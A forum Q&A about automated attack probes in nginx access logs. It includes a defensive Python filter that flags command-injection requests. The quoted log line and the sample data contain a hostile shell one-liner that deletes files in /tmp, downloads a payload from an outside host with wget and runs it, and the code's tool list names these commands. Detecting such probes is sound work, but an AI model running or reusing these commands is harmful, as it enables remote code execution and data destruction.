3

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

170.81.46.70 - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
93.157.62.102 - -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
218.161.62.117 - -  "GET / HTTP/1.1" 400 157 "-" "-"
61.96.64.130 - -  "GET / HTTP/1.1" 400 157 "-" "-"

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?

Artimithe55

1 Answer

2

Is it common for nginx to allow access to a shell?

No.

Is it common for people to create/configure websites that allow access to the shell?

Kind of. Unfortunately.

Does it cost nothing to check?

Yes.

schroeder
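For triaging entries like the ones in the question, here is a small log filter, added as an example and not part of the question or the answer. It flags requests whose decoded query string both chains shell commands and names a download-or-run tool, and it also covers the percent-encoded form of the same probe. The function names, the tool list and the sample lines (documentation addresses) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# nginx "combined" format. The [timestamp] is optional because the excerpt
# in the question has it stripped, leaving two spaces after "- -".
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ +(?:\[[^\]]*\] )?"(?P<request>[^"]*)" (?P<status>\d{3}) '
)
# Greedy target up to the trailing protocol token, so a raw space inside the
# request target (as in the /shell entry) does not break the split.
REQ_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>.*) HTTP/\d(?:\.\d)?$')

CHAIN_RE = re.compile(r'[;|`]|&&|\$\(')                    # command chaining
TOOL_RE = re.compile(r'\b(?:wget|curl|sh|bash|rm|chmod)\b')  # assumed tool list

def classify(line):
    """Return a finding dict for a command-injection probe, else None."""
    m = LINE_RE.match(line)
    req = REQ_RE.match(m["request"]) if m else None
    if not req:
        return None
    path, _, query = req["target"].partition("?")
    decoded = unquote_plus(query)  # '+' -> space, %3B -> ';'
    tools = sorted(set(TOOL_RE.findall(decoded)))
    # Require both signals: ';' alone or the word "wget" alone is often benign.
    if CHAIN_RE.search(decoded) and tools:
        # status records how the server answered (301 here is a redirect).
        return {"ip": m["ip"], "path": path, "status": int(m["status"]),
                "tools": tools, "decoded": decoded}
    return None

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (not real traffic).
SAMPLE = [
    '192.0.2.10 - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+ 198.51.100.7/x;sh+/tmp/x HTTP/1.1" 301 169 "-" "Hello, world"',
    '192.0.2.11 - - [01/Jan/2021:00:00:00 +0000] "GET /search?q=wget+tutorial HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.12 - -  "GET / HTTP/1.1" 400 157 "-" "-"',
    '192.0.2.13 - - [01/Jan/2021:00:00:05 +0000] "GET /shell?cd+%2Ftmp%3Bwget+198.51.100.7%2Fx%3Bsh+%2Ftmp%2Fx HTTP/1.1" 404 153 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The status column is worth reading alongside each finding: a redirect or error code means the probe was answered by the server itself rather than by a handler at that path.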